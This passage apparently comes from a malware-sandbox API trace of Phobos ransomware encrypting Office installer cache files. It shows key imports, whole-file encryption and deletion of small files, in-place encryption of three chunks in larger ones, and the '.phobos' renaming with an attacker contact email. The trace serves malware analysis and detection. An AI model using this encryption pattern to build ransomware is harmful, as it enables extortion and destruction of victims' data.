hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1857) returned 1 [0155.198] CloseHandle (hObject=0x15c) returned 1 [0155.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020 [0155.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.198] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0155.198] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0155.198] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0155.199] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0155.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0155.199] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0155.199] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x741, lpOverlapped=0x0) returned 1 [0155.256] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x750, dwBufLen=0x750 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x750) returned 1 [0155.256] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x750, lpOverlapped=0x0) returned 1 [0155.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0155.258] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0155.258] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0155.258] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.258] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0155.259] CryptDestroyKey (hKey=0xa32da8) returned 1 [0155.259] CloseHandle (hObject=0x15c) returned 1 [0155.259] CloseHandle (hObject=0x148) returned 1 [0155.259] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0155.260] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0155.260] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0155.261] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14127746) returned 1 [0155.261] CloseHandle (hObject=0x148) returned 1 [0155.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020 [0155.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0155.262] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0155.262] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0155.262] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0155.262] ReadFile (in: hFile=0x148, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0155.387] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0155.387] ReadFile (in: hFile=0x148, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0156.133] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0156.133] ReadFile (in: hFile=0x148, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0156.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32c68) returned 1 [0156.824] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0156.824] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0156.830] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.830] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0156.830] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0156.849] SetEndOfFile (hFile=0x148) returned 1 [0156.849] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0156.849] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0156.851] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0156.851] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0156.852] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0156.852] WriteFile (in: hFile=0x148, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0156.853] CloseHandle (hObject=0x148) returned 1 [0156.853] SetEvent (hEvent=0xe8) returned 1 [0156.853] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0156.853] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0156.853] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=868864) returned 1 [0156.853] CloseHandle (hObject=0x148) returned 1 [0156.853] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020 [0156.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0156.854] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0156.854] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0156.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0156.854] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0156.854] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0156.854] ReadFile (in: hFile=0x148, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd4200, lpOverlapped=0x0) returned 1 [0157.098] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd4210, dwBufLen=0xd4210 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd4210) returned 1 [0157.106] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd4210, lpOverlapped=0x0) returned 1 [0157.120] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0157.120] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0157.120] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0157.120] CryptDestroyKey (hKey=0xa32da8) returned 1 [0157.120] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0157.120] CryptDestroyKey (hKey=0xa32c68) returned 1 [0157.120] CloseHandle (hObject=0x148) returned 1 [0157.120] CloseHandle (hObject=0x180) returned 1 [0157.121] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0157.127] SetEvent (hEvent=0xe8) returned 1 [0157.131] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0157.131] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0157.133] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2517504) returned 1 [0157.133] CloseHandle (hObject=0x188) returned 1 [0157.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020 [0157.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0157.133] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0157.134] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0157.134] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0157.134] ReadFile (in: hFile=0x188, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0157.168] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0157.168] ReadFile (in: hFile=0x188, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0157.186] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0157.186] ReadFile (in: hFile=0x188, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0157.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ca8) returned 1 [0157.267] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0157.267] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0157.274] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.274] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0157.274] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0157.331] SetEndOfFile (hFile=0x188) returned 1 [0157.331] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0157.331] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0157.333] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0157.333] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0157.337] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0157.337] WriteFile (in: hFile=0x188, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0157.338] CloseHandle (hObject=0x188) returned 1 [0157.339] SetEvent (hEvent=0xe8) returned 1 [0157.425] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0157.425] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0157.425] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=868864) returned 1 [0157.425] CloseHandle (hObject=0x140) returned 1 [0157.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020 [0157.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.428] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0157.428] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0157.428] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0157.428] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0157.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0157.428] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0157.428] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd4200, lpOverlapped=0x0) returned 1 [0157.582] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd4210, dwBufLen=0xd4210 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd4210) returned 1 [0157.589] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd4210, lpOverlapped=0x0) returned 1 [0157.601] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0157.601] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0157.602] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0157.602] CryptDestroyKey (hKey=0xa32d28) returned 1 [0157.602] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0157.602] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.602] CloseHandle 